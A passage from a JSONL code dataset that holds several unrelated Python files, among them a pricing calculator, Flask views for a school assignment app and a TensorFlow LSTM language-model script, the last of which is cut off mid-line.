root.CreateTree(200)\n #printTree\n printTree(root)\n print(root.inordertraversal(root))\n #print(root.preordertraversal(root))\n #print(root.postordertraversal(root))\n #print(leftView(root,1,{}))\n \nif __name__=='__main__':\n main()\n\n\n","sub_path":"binary_tree_all.py","file_name":"binary_tree_all.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"218892544","text":"# -*- coding: utf-8 -*-\nimport torch\nfrom torchvision import datasets, transforms\n\n\ndef mnist():\n transform = transforms.Compose(\n [transforms.ToTensor(), transforms.Normalize((0.5,), (0.5,))]\n )\n # exchange with the real mnist dataset\n trainset = datasets.MNIST(\n \"../../data/\", download=True, train=True, transform=transform\n )\n testset = datasets.MNIST(\n \"../../data/\", download=True, train=False, transform=transform\n )\n return trainset, testset\n\n\nmnist()\n","sub_path":"src/data/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"169304943","text":"__author__ = 'Experiment'\n\nfrom src import old_functions as f\n\n# a = Focus.scan(70, 90, 50, 'Z', waitTime = .1)\n# sets the focus\n# a = f.Focus.scan(20, 90, 50, 'Z', waitTime = .1, APD=True)\n\n# a = f.Focus.scan(20, 90, 40, 'Z', waitTime = .1, APD=True)\n\n\nscan_range_roi = {\n \"dx\": 0.1,\n \"dy\": 0.1,\n \"xPts\": 20,\n \"xo\": 0.0,\n \"yPts\": 20,\n \"yo\": 0.0\n}\n\nif __name__ == '__main__':\n a = f.Focus.scan(32.5, 42.5, 40, 'Z', waitTime = .1, APD=True, scan_range_roi = scan_range_roi)","sub_path":"src/old_scripts/scan_focus.py","file_name":"scan_focus.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"268046315","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAn implementation of the Enum data type\n\"\"\"\nfrom __future__ import unicode_literals\n\n\n# For use with deployment statuses\n# https://stackoverflow.com/a/1695250\ndef enum(*sequential, **named):\n \"\"\"An implementation of the Enum data type\n\n Usage\n myEnum= enum(\n 'Apple'\n , 'Banana')\n \"\"\"\n enums = dict(zip(sequential, range(len(sequential))), **named)\n reverse = dict((value, key) for key, value in list(enums.items()))\n enums['reverse_mapping'] = reverse\n return type(str('Enum'), (), 
enums)\n","sub_path":"processrunner/enum.py","file_name":"enum.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"313119141","text":"from typing import List, Dict\nimport collections\n\n\ndef cheapest_shipment(all_orders: Dict[str, int], warehouses: List[Dict]) -> List[Dict[str,Dict[str,int]]]:\n \"\"\"\n preconditions:\n - assume warehouses presorted based on cost\n - assume integer arguments are 32 bit signed, <=2^32 -1\n - assume integer arguments in items are > 0; invalid order if ordering <= 0 of an item\n - assume integer arguments in warehouses >= 0\n - assume every top level dictionary object in warehouses have distinct\n 'name' value associated with its 'name' key\n - assume valid schema for input\n \"\"\"\n # either argument is empty, so it is impossible to fulfill a shipment\n if not all_orders or not warehouses:return []\n # initialize global shipment container\n shipment = collections.defaultdict(dict)\n for key,val in all_orders.items():\n count = 0\n # initialize shipment container for warehouse & inventory for order item key\n item_warehouse_shipments = collections.defaultdict(dict)\n # greedily select items from lowest cost warehouse to next\n for warehouse in warehouses:\n if key in warehouse['inventory'] and warehouse['inventory'][key]>0:\n if warehouse['inventory'][key] + count >=val:\n item_warehouse_shipments[warehouse['name']][key] = val-count\n count = val\n break\n else:\n item_warehouse_shipments[warehouse['name']][key] = warehouse['inventory'][key]\n count+=warehouse['inventory'][key]\n #update global shipments if current order has sufficient inventory\n if val == count:\n for name,warehouse_order in item_warehouse_shipments.items():\n shipment[name].update(warehouse_order)\n\n return [{key:val} for key,val in shipment.items()]\n\n\n\n\n","sub_path":"inventory-allocator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"91760733","text":"import math\n\n_x = input(\"Enter the element length: \")\n_y = input(\"Enter the element width: \")\n_z = input(\"Enter the element thickness: \")\n_ro = input(\"Enter the foam density [22, 24, 27, 35, 65, 100, MD]: \")\n_moq = input(\"Enter the MOQ: \")\n\ndef cena_materialu(): #Returns the price of the selected material\n \n ceny = (260, 280, 300, 400, 750, 1300, 330) #material prices\n \n if _ro.upper() == \"MD\": #material selection\n cena = ceny[6]\n elif int(_ro) == 22:\n cena = ceny[0]\n elif int(_ro) == 24:\n cena = ceny[1]\n elif int(_ro) == 27:\n cena = ceny[2]\n elif int(_ro) == 35:\n cena = ceny[3]\n elif int(_ro) == 65:\n cena = ceny[4]\n elif int(_ro) == 100:\n cena = ceny[5]\n else:\n print(\"Invalid parameters given!\")\n return float(cena)\n\ndef rozkroj_std(): #Determines how many pieces fit on the cutting die\n ax = int(1180 / int(_x))\n ay = int(780 / int(_y))\n bx = int(780 / int(_x))\n by = int(1180 / int(_y))\n \n if (ax * ay) > (bx * by):\n return ax * ay\n else: # covers the equal-count case too, so None is never returned\n return bx * by\n\ndef rozkroj():\n pass\n\ndef paletyzacja(): #determines product palletization\n szt_plt = round(1500 / int(_z) * rozkroj_std(), 0)\n return int(szt_plt)\n\n\ndef material(): #value of the material used\n mat = 800 * 1200 * int(_z) / 1000000000 * cena_materialu() / rozkroj_std()\n return round(mat, 3)\n\ndef stamping(): #press operating cost\n stamp = ((0.48 / rozkroj_std()) + (60 * (30/60) / int(_moq)))\n 
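# [added note, an interpretation of the constants] 0.48 PLN per press stroke divided by\n # the pieces per die, plus a 30 min setup at 60 PLN/h amortized over the MOQ\n 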
return round(stamp, 3)\n\ndef kitting(): #pallet and stretch-wrap costs\n paleta = 1\n stretch = 5\n kitting = (stretch / paletyzacja()) + (paleta / paletyzacja())\n return round(kitting, 3)\n\ndef logistyka(): #internal logistics costs\n logistyka = (6 / paletyzacja()) + (2 / paletyzacja())\n return round(logistyka, 3)\n\ndef ovh(a, b): #overheads\n return a * b\n\ndef margin(d, m): #margin\n return d / m \n\ndef nasze_moq(pal,moq):\n if int(_moq) <= paletyzacja():\n return print(\"MOQ Deles:\", paletyzacja() , \"pcs.\")\n else:\n return int(moq)\n\nmat_ovh_std = ovh(material(), 1.16)\nmat_ovh_min = ovh(material(), 1.06)\nstamp_ovh = ovh(stamping(), 1.25)\nkit_ovh = ovh(kitting(), 1.25)\nlog_ovh = ovh(logistyka(), 1.25)\n\nmat_mar_min = round(margin(mat_ovh_min, 0.91), 2)\nmat_mar_std = round(margin(mat_ovh_std, 0.78), 2)\nstamp_marg = round(margin(stamp_ovh, 0.8), 2)\nkit_mar = round(margin(kit_ovh, 0.8), 2)\nlog_mar = round(margin(log_ovh, 0.8), 2)\n\ncena_std = mat_mar_std + stamp_marg + kit_mar + log_mar\ncena_min = mat_mar_min + stamp_marg + kit_mar + log_mar\n\nprint(\"Starting price:\" , round(cena_std,2) , \"zł.\")\nprint(\"Minimum price:\" , round(cena_min,2) , \"zł.\")\nprint(\"Palletization:\", paletyzacja() ,\"pcs/pallet.\")\nprint(\"Cutting layout:\", rozkroj_std())\n","sub_path":"PRODUKCJA.py","file_name":"PRODUKCJA.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"507152857","text":"from flask import render_template, redirect, url_for, abort, flash, request,\\\n current_app, make_response\nfrom flask_login import login_required, current_user\nfrom flask_sqlalchemy import get_debug_queries\nfrom . import main\nfrom .forms import EditProfileForm, EditProfileAdminForm, AssignmentForm,\\\n QuestionForm\nfrom .. 
import db\nfrom ..models import School, Permission, Role, User, Assignment, StudentAssignment, SchoolUser, Class\nfrom ..decorators import admin_required, permission_required\n\n\n@main.after_app_request\ndef after_request(response):\n for query in get_debug_queries():\n if query.duration >= current_app.config['RWC_SLOW_DB_QUERY_TIME']:\n current_app.logger.warning(\n 'Slow query: %s\\nParameters: %s\\nDuration: %fs\\nContext: %s\\n'\n % (query.statement, query.parameters, query.duration,\n query.context))\n return response\n\n\n@main.route('/shutdown')\ndef server_shutdown():\n if not current_app.testing:\n abort(404)\n shutdown = request.environ.get('werkzeug.server.shutdown')\n if not shutdown:\n abort(500)\n shutdown()\n return 'Shutting down...'\n\n\n@main.route('/', methods=['GET', 'POST'])\ndef index():\n form = AssignmentForm()\n\n if current_user.can(Permission.CREATE_ASSIGNMENT) and form.validate_on_submit():\n assign = Assignment(body=form.body.data)\n db.session.add(assign)\n db.session.commit()\n return redirect(url_for('.index'))\n\n page = request.args.get('page', 1, type=int)\n _show_assignments = False\n if current_user.is_authenticated:\n _show_assignments = bool(request.cookies.get('show_assignments', ''))\n\n if _show_assignments:\n query = StudentAssignment.query.filter(StudentAssignment.student_id == current_user.id)\n else:\n query = Assignment.query\n pagination = query.paginate(\n # pagination = query.order_by(Assignment.timestamp.desc()).paginate(\n page, per_page=current_app.config['RWC_ASSIGN_PER_PAGE'],\n error_out=False)\n assign = pagination.items\n return render_template('index.html', form=form, assignments=assign,\n show_assignments=_show_assignments, pagination=pagination)\n\n\n@main.route('/user/')\ndef user(username):\n user = User.query.filter_by(username=username).first_or_404()\n page = request.args.get('page', 1, type=int)\n pagination = user.schools.paginate(\n page, per_page=current_app.config['RWC_ASSIGNMENTS_PER_PAGE'],\n error_out=False)\n schools = pagination.items\n return render_template('user.html', user=user, schools=schools,\n pagination=pagination)\n\n\n# TODO: not unique\n@main.route('/class/')\ndef _class(name):\n _class = Class.query.filter_by(name=name).first_or_404\n page = request.args.get('page', 1, type=int)\n pagination = _class.students.paginate(\n page, per_page=current_app.config['RWC_ASSIGNMENTS_PER_PAGE'],\n error_out=False)\n students = pagination.items\n teacher = _class.teacher\n assign = _class.assignments\n return render_template('class.html', name=name, students=students, teacher=teacher, assignment=assign,\n pagination=pagination)\n\n\n@main.route('/edit-profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm()\n if form.validate_on_submit():\n current_user.name = form.name.data\n current_user.location = form.location.data\n current_user.about_me = form.about_me.data\n db.session.add(current_user._get_current_object())\n db.session.commit()\n flash('Your profile has been updated.')\n return redirect(url_for('.user', username=current_user.username))\n form.name.data = current_user.name\n form.location.data = current_user.location\n form.about_me.data = current_user.about_me\n return render_template('edit_profile.html', form=form)\n\n\n@main.route('/edit-profile/', methods=['GET', 'POST'])\n@login_required\n@admin_required\ndef edit_profile_admin(id):\n user = User.query.get_or_404(id)\n form = EditProfileAdminForm(user=user)\n if form.validate_on_submit():\n user.email = 
form.email.data\n user.username = form.username.data\n user.confirmed = form.confirmed.data\n user.role = Role.query.get(form.role.data)\n user.name = form.name.data\n user.location = form.location.data\n user.about_me = form.about_me.data\n db.session.add(user)\n db.session.commit()\n flash('The profile has been updated.')\n return redirect(url_for('.user', username=user.username))\n form.email.data = user.email\n form.username.data = user.username\n form.confirmed.data = user.confirmed\n form.role.data = user.role_id\n form.name.data = user.name\n form.location.data = user.location\n form.about_me.data = user.about_me\n return render_template('edit_profile.html', form=form, user=user)\n\n# TODO: Update this\n\n\n@main.route('/assignment/', methods=['GET', 'POST'])\ndef assignment(id):\n _assignment = Assignment.query.get_or_404(id)\n\n form = AssignmentForm()\n \"\"\"\n if form.validate_on_submit():\n question = question(body=form.body.data,\n assignment=assignment,\n author=current_user._get_current_object())\n db.session.add(question)\n db.session.commit()\n flash('Your question has been published.')\n return redirect(url_for('.assignment', id=assignment.id, page=-1))\n \"\"\"\n page = request.args.get('page', 1, type=int)\n if page == -1:\n page = (_assignment.question.count() - 1) // \\\n current_app.config['RWC_QUESTIONS_PER_PAGE'] + 1\n pagination = _assignment.questions.order_by(assignment.timestamp.asc()).paginate(\n page, per_page=current_app.config['RWC_QUESTIONS_PER_PAGE'],\n error_out=False)\n q = pagination.items\n return render_template('assignment.html', assignment=[_assignment], form=form,\n questions=q, pagination=pagination)\n\n\n@main.route('/edit/', methods=['GET', 'POST'])\n@login_required\ndef edit(id):\n assignment = Assignment.query.get_or_404(id)\n if current_user != assignment.author and \\\n not current_user.can(Permission.ADMIN):\n abort(403)\n form = AssignmentForm()\n if form.validate_on_submit():\n assignment.body = form.body.data\n db.session.add(assignment)\n db.session.commit()\n flash('The assignment has been updated.')\n return redirect(url_for('.assignment', id=assignment.id))\n form.body.data = assignment.body\n return render_template('edit_assignment.html', form=form)\n\n\n@main.route('/all')\n@login_required\ndef show_all():\n resp = make_response(redirect(url_for('.index')))\n resp.set_cookie('show_all', '', max_age=30*24*60*60)\n return resp\n\n\n@main.route('/assignments')\n@login_required\ndef show_assignments():\n resp = make_response(redirect(url_for('.index')))\n resp.set_cookie('show_assignments', '1', max_age=30*24*60*60)\n return resp\n","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"271111891","text":"#!/usr/bin/env python\n\n# Copyright 2015 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"Example / benchmark for building a PTB LSTM model.\n\nTrains the model described in:\n(Zaremba, et. al.) Recurrent Neural Network Regularization\nhttp://arxiv.org/abs/1409.2329\n\nThere are 3 supported model configurations:\n===========================================\n| config | epochs | train | valid | test\n===========================================\n| small | 13 | 37.99 | 121.39 | 115.91\n| medium | 39 | 48.45 | 86.16 | 82.07\n| large | 55 | 37.87 | 82.62 | 78.29\nThe exact results may vary depending on the random initialization.\n\nThe hyperparameters used in the model:\n- init_scale - the initial scale of the weights\n- learning_rate - the initial value of the learning rate\n- max_grad_norm - the maximum permissible norm of the gradient\n- num_layers - the number of LSTM layers\n- num_steps - the number of unrolled steps of LSTM\n- hidden_size - the number of LSTM units\n- max_epoch - the number of epochs trained with the initial learning rate\n- max_max_epoch - the total number of epochs for training\n- keep_prob - the probability of keeping weights in the dropout layer\n- lr_decay - the decay of the learning rate for each epoch after \"max_epoch\"\n- batch_size - the batch size\n\nThe data required for this example is in the data/ dir of the\nPTB dataset from Tomas Mikolov's webpage:\n\n$ wget http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz\n$ tar xvf simple-examples.tgz\n\nTo run:\n\n$ python ptb_word_lm.py --data_path=simple-examples/data/\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport time\nimport json\nimport numpy as np\nimport tensorflow as tf\nimport sys\nfrom scipy.ndimage.interpolation import shift\n# We put config in a separate file so that loading a config object does (using pickle)\n# import this file twice (which triggers error)\nfrom config import *\n\n# Using our custom reader\nimport reader\n\n# same tokenization as training set\nimport sentence_cleaner\n\nACTIONS = [\"test\", \"train\", \"ppl\", \"predict\", \"continue\", \"loglikes\", \"probs\", \"export\"]\nLOSS_FCTS = [\"softmax\", \"nce\", \"sampledsoftmax\"]\n\nMODEL_PARAMS_INT = [\n \"max_grad_norm\"\n \"num_layers\",\n \"num_steps\",\n \"hidden_size\",\n \"max_epoch\",\n \"max_max_epoch\",\n \"batch_size\",\n \"vocab_size\"]\nMODEL_PARAMS_FLOAT = [\n \"init_scale\",\n \"learning_rate\",\n \"keep_prob\",\n \"lr_decay\"]\n\n\nflags = tf.flags\nlogging = tf.logging\n\nflags.DEFINE_string(\"model_dir\", \"model\", \"model_dir (containing ckpt files and word_to_id)\")\nflags.DEFINE_string(\"action\", \"test\", \"should we train or test. Possible options are: %s\" % \", \".join(ACTIONS))\nflags.DEFINE_string(\n \"config\", None,\n \"A type of model. 
Possible options are: 'small', 'medium', 'large' or path to config file.\")\nflags.DEFINE_string(\"data_path\", None,\n \"Where the training/test data is stored.\")\nflags.DEFINE_string(\"loss\", \"softmax\",\n \"The loss function to use. Possible options are %s\" % \", \".join(LOSS_FCTS))\nflags.DEFINE_bool(\"use_fp16\", False,\n \"Train using 16-bit floats instead of 32bit floats\")\n\nflags.DEFINE_bool(\"nosave\", False, \"Set to force model not to be saved\")\nflags.DEFINE_integer(\"log\", 10, \"How often to print information and save model: each (epoch_size/log) steps. (--log 100: each 1% --log 50: each 2%, --log 10: each 10% etc\")\n\nflags.DEFINE_float(\"threshold\", 100., \"cutoff for perplexity or loglikes or probs value\")\nflags.DEFINE_bool(\"debug\", False, \"dump sentence pairs\")\n\nfor param in MODEL_PARAMS_INT:\n flags.DEFINE_integer(param, None, \"Manually set model %s\" % param)\nfor param in MODEL_PARAMS_FLOAT:\n flags.DEFINE_float(param, None, \"Manually set model %s\" % param)\nMODEL_PARAMS = MODEL_PARAMS_INT + MODEL_PARAMS_FLOAT\n\n\nFLAGS = flags.FLAGS\n\n\ndef data_type():\n return tf.float16 if FLAGS.use_fp16 else tf.float32\n\n\n\n\n\nclass Model(object):\n \"\"\"The model.\"\"\"\n\n def __init__(self, is_training, config, loss_fct=\"softmax\", test_opti=False):\n self.config = config\n self.batch_size = batch_size = config.batch_size\n self.num_steps = num_steps = config.num_steps\n size = config.hidden_size\n self.vocab_size = vocab_size = config.vocab_size\n self.loss_fct = loss_fct\n self.is_training = is_training\n\n self._input_data = tf.placeholder(tf.int32, [batch_size, num_steps])\n self._targets = tf.placeholder(tf.int32, [batch_size, num_steps])\n\n lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(size, forget_bias=0.0, state_is_tuple=True)\n if is_training and config.keep_prob < 1:\n lstm_cell = tf.nn.rnn_cell.DropoutWrapper(\n lstm_cell, output_keep_prob=config.keep_prob)\n cell = tf.nn.rnn_cell.MultiRNNCell([lstm_cell] * config.num_layers, state_is_tuple=True)\n\n self._initial_state = cell.zero_state(batch_size, data_type())\n\n with tf.device(\"/cpu:0\"):\n embedding = tf.get_variable(\n \"embedding\", [vocab_size, size], dtype=data_type())\n inputs = tf.nn.embedding_lookup(embedding, self._input_data)\n\n if is_training and config.keep_prob < 1:\n inputs = tf.nn.dropout(inputs, config.keep_prob)\n\n\n inputs = [tf.squeeze(input_, [1])\n for input_ in tf.split(1, num_steps, inputs)]\n outputs, state = tf.nn.rnn(cell=cell, inputs=inputs, initial_state=self._initial_state)\n output = tf.reshape(tf.concat(1, outputs), [-1, size])\n\n # We are not masking loss anyway, so it is basically only ones\n # Still may change in near future\n mask = tf.ones([self.batch_size * self.num_steps])\n\n if test_opti:\n # If test_opti is True we assume that the model has w_t variable\n # this makes a huge performance improvement (especially on large model/vocab\n # but require model weights to be transposed.\n # See transpose.py\n self.w_t = w_t = tf.get_variable(\"w_t\", [size, vocab_size], dtype=data_type())\n self.b = b = tf.get_variable(\"b\", [vocab_size], dtype=data_type())\n loss, logits, probs = self.softmax(output, w_t, b, mask)\n self.logits = logits\n self.probs = probs\n\n elif not is_training or self.loss_fct == \"softmax\":\n # Regular testing using softmax and default \"w\" weights matrix\n # It may be really slower than 'test_opti'\n w = tf.get_variable(\"w\", [vocab_size, size], dtype=data_type())\n b = tf.get_variable(\"b\", [vocab_size], dtype=data_type())\n 
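# [added note] the matmul in softmax() needs weights shaped [size, vocab], while the\n # training losses (nce / sampled softmax) store w as [vocab, size]; the transpose\n # below is the runtime cost that the 'test_opti' / transpose.py path above precomputes away\n 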
w_t = tf.transpose(w)\n\n loss, logits, probs = self.softmax(output, w_t, b, mask)\n self.logits = logits\n self.probs = probs\n\n elif self.loss_fct == \"nce\":\n w = tf.get_variable(\"w\", [vocab_size, size], dtype=data_type())\n b = tf.get_variable(\"b\", [vocab_size], dtype=data_type())\n num_samples = 64\n labels = tf.reshape(self._targets, [-1,1])\n hidden = output\n loss = tf.nn.nce_loss(w, b,\n hidden,\n labels,\n num_samples,\n vocab_size)\n elif self.loss_fct == \"sampledsoftmax\":\n w = tf.get_variable(\"w\", [vocab_size, size], dtype=data_type())\n b = tf.get_variable(\"b\", [vocab_size], dtype=data_type())\n num_samples = 1024\n labels = tf.reshape(self._targets, [-1,1])\n hidden = output\n\n loss = self.sampled_softmax(w, b, labels, hidden, num_samples, mask)\n\n else:\n raise ValueError(\"Unsupported loss function: %s\" % loss_fct)\n self._cost = cost = tf.reduce_sum(loss) / batch_size\n self._final_state = state\n\n if not is_training:\n return\n\n self._lr = tf.Variable(0.0, trainable=False)\n tvars = tf.trainable_variables()\n grads, _ = tf.clip_by_global_norm(tf.gradients(cost, tvars),\n config.max_grad_norm)\n optimizer = tf.train.GradientDescentOptimizer(self._lr)\n self._train_op = optimizer.apply_gradients(\n zip(grads, tvars),\n global_step=tf.contrib.framework.get_or_create_global_step())\n\n self._new_lr = tf.placeholder(\n tf.float32, shape=[], name=\"new_learning_rate\")\n self._lr_update = tf.assign(self._lr, self._new_lr)\n\n def assign_lr(self, session, lr_value):\n session.run(self._lr_update, feed_dict={self._new_lr: lr_value})\n\n def sampled_softmax(self, w, b, labels, hidden, num_samples, mask):\n vocab_size = self.vocab_size\n def _loss_fct(inputs_, labels_):\n labels_ = tf.reshape(labels_, [-1, 1])\n return tf.nn.sampled_softmax_loss(\n w, b, inputs_, labels_, num_samples, vocab_size)\n\n loss = tf.nn.seq2seq.sequence_loss_by_example(\n [ hidden],\n [ labels ],\n [ mask],\n num_samples,\n softmax_loss_function=_loss_fct)\n return loss\n\n def softmax(self, output, w, b, mask):\n logits = tf.matmul(output, w)+b\n loss = tf.nn.seq2seq.sequence_loss_by_example(\n [logits],\n [tf.reshape(self._targets, [-1])],\n [mask])\n probs = tf.nn.softmax(logits)\n\n return loss, logits, probs\n\n @property\n def initial_state(self):\n return self._initial_state\n\n @property\n def cost(self):\n return self._cost\n\n @property\n def final_state(self):\n return self._final_state\n\n @property\n def lr(self):\n return self._lr\n\n @property\n def train_op(self):\n return self._train_op\n\n\ndef run_epoch(session, model, data, eval_op=None, verbose=False, idict=None, saver=None, action=\"\", log=10):\n \"\"\"Runs the model on the given data.\n Returns:\n - if idict is set (prediction mode):\n a tuple ppl, predictions\n - else if loglikes:\n loglikes (-costs/log(10))\n - else:\n perxplexity= exp(costs/iters)\n \"\"\"\n epoch_size = ((len(data) // model.batch_size) - 1) // model.num_steps\n config = model.config\n costs = 0.0\n iters = 0\n\n last_step = config.step if model.is_training else 0\n if last_step > 0:\n state = _load_state()\n print(\"Last step: %d\" % last_step)\n else:\n state = session.run(model.initial_state)\n predictions = []\n\n word_probs = []\n\n start_time = time.time()\n for step, (x, y) in enumerate(reader.iterator(data, model.batch_size,\n model.num_steps)):\n if last_step > step: continue\n\n fetches = {\"cost\": model.cost, \"state\": model.final_state, \"probs\": model.probs}\n\n if eval_op is not None:\n fetches[\"eval_op\"] = eval_op\n\n 
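# [added note] session.run evaluates every tensor in 'fetches' in one pass and returns\n # matching numpy values; feed_dict supplies the batch plus the recurrent state from the\n # previous step, so the LSTM state is carried across the whole epoch\n 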
feed_dict = {}\n feed_dict[model._input_data] = x\n feed_dict[model._targets] = y\n for i, (c, h) in enumerate(model.initial_state):\n feed_dict[c] = state[i].c\n feed_dict[h] = state[i].h\n\n\n # Catching error & returning -99 as we may need an output for each input\n # (can't just ignore)\n try:\n vals = session.run(fetches, feed_dict)\n except ValueError as e:\n print(\"[ERROR] Error while running step %d (value: =\\\"%s\\\")\" % (step, str(x)),\n\t\tfile=sys.stderr)\n print(\"[ERROR] Aborting run_step; returning -99\", file=sys.stderr)\n print(e, file=sys.stderr)\n return -99.0\n\n cost = vals['cost']\n state = vals['state']\n probs = vals['probs']\n costs += cost\n iters += model.num_steps\n\n word_probs.append(probs[0][y[0][0]])\n\n # Predict mode\n if idict is not None:\n probs = probs[0]\n next_id = np.argmax(probs)\n xx = x[0][0]\n yy = y[0][0]\n prediction = {\n 'word': idict[xx],\n \"target\": idict[yy],\n \"prob\": float(probs[yy]),\n \"pred_word\": idict[next_id],\n \"pred_prob\": float(probs[next_id]),\n }\n predictions.append(prediction)\n\n # Logging results & Saving\n if log<0 or log>100:\n log = 10\n if verbose and step % (epoch_size // log) == 1:\n print(\"%.3f perplexity: %.3f speed: %.0f wps\" %\n (step * 1.0 / epoch_size, np.exp(costs / iters),\n iters * model.batch_size / (time.time() - start_time)))\n if saver is not None:\n _save_checkpoint(saver, session, \"ep_%d_step_%d.ckpt\" % (config.epoch, step))\n _save_state(state)\n config.step = step\n config.save()\n\n\n config.step = 0\n\n\n # Perplexity and loglikes\n ppl = np.exp(costs / iters)\n ll = -costs / np.log(10)\n\n if action == \"ppl\":\n return ppl\n elif action == \"loglikes\":\n return ll\n elif action == \"predict\":\n return predictions\n elif action == \"probs\":\n return shift(word_probs, 1, cval=0.)\n\n return None\n\ndef _save_checkpoint(saver, session, name):\n path = os.path.join(FLAGS.model_dir, name)\n print(\"Saving %s\" % path)\n saver.save(session, path)\n\ndef _state_path():\n return os.path.join(FLAGS.model_dir, \"state\")\n\ndef _load_state():\n with open(_state_path(), 'r') as f:\n return pickle.load(f)\n\ndef _save_state(state):\n with open(_state_path(), 'w') as f:\n pickle.dump(state, f)\n\nfrom config import Config\ndef get_config():\n params = {key: FLAGS.__getattr__(key) for key in MODEL_PARAMS}\n config_path = os.path.join(FLAGS.model_dir, \"config\")\n return Config(config=FLAGS.config, path=config_path, params=params)\n\ndef _restore_session(saver, session):\n ckpt = tf.train.get_checkpoint_state(FLAGS.model_dir)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(session, ckpt.model_checkpoint_path)\n return session\n else:\n raise ValueError(\"No checkpoint file found\")\n\n\nimport os\nimport pickle\nimport util\ndef main(_):\n assert(FLAGS.action in ACTIONS)\n assert(FLAGS.loss in LOSS_FCTS)\n\n loss_fct = FLAGS.loss\n action = FLAGS.action\n\n train = action in [\"train\", \"continue\"]\n test = action == \"test\"\n linebyline = action in [\"ppl\", \"loglikes\", \"predict\", \"probs\", \"export\"]\n\n util.mkdirs(FLAGS.model_dir)\n\n if not (FLAGS.data_path or linebyline):\n raise ValueError(\"Must set --data_path to data directory\")\n\n config = get_config()\n\n word_to_id_path = os.path.join(FLAGS.model_dir, \"word_to_id\")\n if action != \"train\":\n with open(word_to_id_path, 'r') as f:\n word_to_id = pickle.load(f)\n\n else:\n word_to_id = None\n config.epoch = 1\n config.step = 0\n\n # Reading fast_test.\n # This option is enabled by 'transpose.py'\n fast_test = 
False\n if \"fast_test\" in config.__dict__:\n # Be sure to set a boolean\n fast_test = bool(config.fast_test)\n\n eval_config = Config(clone=config)\n eval_config.batch_size = 1\n eval_config.num_steps = 1\n\n # Load data\n if not linebyline:\n raw_data = reader.raw_data(FLAGS.data_path, training=train, word_to_id=word_to_id)\n train_data, valid_data, test_data, word_to_id = raw_data\n with tf.Graph().as_default():\n initializer = tf.random_uniform_initializer(-config.init_scale,\n config.init_scale)\n\n # Defining model(s)\n if train:\n # Saving word_to_id & conf to file\n with open(word_to_id_path, 'w') as f:\n pickle.dump(word_to_id, f)\n\n with tf.name_scope(\"Train\"):\n with tf.variable_scope(\"Model\", reuse=False, initializer=initializer):\n m = Model(is_training=True, config=config, loss_fct=loss_fct)\n tf.scalar_summary(\"Training Loss\", m.cost)\n tf.scalar_summary(\"Learning Rate\", m.lr)\n\n with tf.name_scope(\"Valid\"):\n with tf.variable_scope(\"Model\", reuse=True, initializer=initializer):\n mvalid = Model(is_training=False, config=config)\n tf.scalar_summary(\"Validation Loss\", mvalid.cost)\n\n with tf.name_scope(\"Test\"):\n with tf.variable_scope(\"Model\", reuse=train, initializer=initializer):\n mtest = Model(is_training=False, config=eval_config, test_opti=fast_test)\n\n\n saver = tf.train.Saver()\n init_op = tf.global_variables_initializer()\n with tf.Session() as session:\n session.run(init_op)\n if train:\n config.save()\n if action == \"continue\":\n session = _restore_session(saver, session)\n\n saver = None if FLAGS.nosave else saver\n print(\"Starting training from epoch %d using %s\" % (config.epoch, loss_fct))\n\n while config.epoch <= config.max_max_epoch:\n i = config.epoch\n lr_decay = config.lr_decay ** max(i - config.max_epoch, 0.0)\n m.assign_lr(session, config.learning_rate * lr_decay)\n\n print(\"Epoch: %d Learning rate: %.3f\" % (i, session.run(m.lr)))\n train_perplexity = run_epoch(session, m, train_data, eval_op=m.train_op,\n verbose=True, saver=saver, log=FLAGS.log)\n print(\"Epoch: %d Train Perplexity: %.3f\" % (i, train_perplexity))\n\n valid_perplexity = run_epoch(session, mvalid, valid_data)\n print(\"Epoch: %d Valid Perplexity: %.3f\" % (i, valid_perplexity))\n\n config.step = 0\n config.epoch += 1\n config.save()\n\n else:\n session = _restore_session(saver, session)\n\n if FLAGS.action == \"export\":\n tf.train.write_graph(session.graph_def, FLAGS.model_dir, 'graph.pb')\n sys.exit()\n\n # Line by line processing (=ppl, predict, loglikes)\n if linebyline:\n while True:\n lines = sys.stdin.readline()\n if not lines: break\n\n lines = lines.strip().split('\\t')\n results = []\n for line in lines:\n idict = None\n test_data = sentence_cleaner.clean(line,word_to_id)\n\n if len(test_data) < 2:\n print(-9999)\n continue\n\n inverse_dict = dict(zip(word_to_id.values(), word_to_id.keys()))\n result = run_epoch(session, mtest, test_data, idict=inverse_dict, action=FLAGS.action)\n results.append((test_data, result))\n\n if FLAGS.action == 'predict':\n print(json.dumps(results))\n\n if FLAGS.action in ['ppl', 'loglikes']:\n if len(lines) == 2:\n print(\"%.2f, %.2f, %.2f\" % 